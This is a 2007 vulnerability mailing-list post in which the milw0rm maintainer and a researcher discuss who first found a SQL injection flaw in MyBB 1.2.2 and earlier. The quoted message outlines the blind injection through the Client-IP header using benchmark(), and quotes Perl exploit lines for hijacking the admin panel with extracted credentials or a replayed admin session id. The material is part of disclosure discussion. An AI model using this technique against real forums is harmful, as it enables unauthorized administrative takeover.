[VIM] Milw0rm 3719 (Mybb <= 1.2.2)
str0ke
str0ke at milw0rm.com
Thu Apr 12 17:51:58 UTC 2007
It was posted to go along with his paper that went up today. Guessing
he just wanted to show an example of it in action.
http://www.milw0rm.com/papers/149
/str0ke
On 4/12/07, GM darkfig <gmdarkfig at gmail.com> wrote:
> The guy uses the same vulnerability I found
> (http://acid-root.new.fr/poc/28070403.txt).
> He uses the same method (benchmark(), Client-IP, DELETE from
> prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's
> just the perl version. He uses the solution number 1 I said in my
> exploit:
>
> # SOLUTION NUMBER 1
> # mysql> select * from mybb_users\G
> # *************************** 1. row ***************************
> # uid: 1
> # username: root
> # password: 39ac8681f5cf4fcd9c9c09719a618bd3
> # salt: BFeJBOCF
> # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
> #
> # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
> #
> # SOLUTION NUMBER 2
> # mysql> select * from mybb_adminsessions\G
> # *************************** 1. row ***************************
> # sid: 81e267263b9254f3aaf670383bfbfec9
> # uid: 1
> # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
> # ip: 127.0.0.1
> # dateline: 1175443967
> # lastactive: 1175444369
> #
> # $xpl->addheader('Client-IP','127.0.0.1');
> # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
> #
> # I decided to use the solution number 2.
>